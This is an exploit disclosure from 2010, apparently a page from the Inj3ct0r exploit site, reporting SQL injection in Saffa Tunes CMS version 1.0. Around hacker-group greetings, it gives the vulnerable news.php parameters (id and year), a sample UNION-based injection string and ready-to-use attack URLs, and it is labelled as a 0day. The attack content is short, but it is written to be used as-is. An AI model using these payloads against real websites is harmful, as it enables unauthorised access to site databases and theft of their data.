Saffa Tunes CMS (news.php) SQL Injection Vulnerability
Posted on 20 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Saffa Tunes CMS (news.php) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== Saffa Tunes CMS (news.php) SQL Injection Vulnerability ====================================================== # Exploit Title: Saffa Tunes CMS (news.php) SQL Injection Vulnerability # Author: Th3 RDX # Software Link: # Version: 1.0 # Tested on: Demo Site -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################## %// ----- [ Founder ] ----- Th3 RDX ----- [ E - mail ] ----- th3rdx@gmail.com %\ ############################################################################## ############################################################################## %// ----- [Title] ----- Saffa Tunes CMS (news.php) SQL Injection Vulnerability ----- [ Vendor ] ----- http://cms.saffatunes.com/ %\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = news.php?id=9+and+1=0+ Union 2,3,4,5,6 (tables & column) } [SQLi] http://server/cms/news.php?id=9[CODE] [SQLi] http://server/cms/news.php?year=2010[CODE] %\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 19 June 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #End 0Day# # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>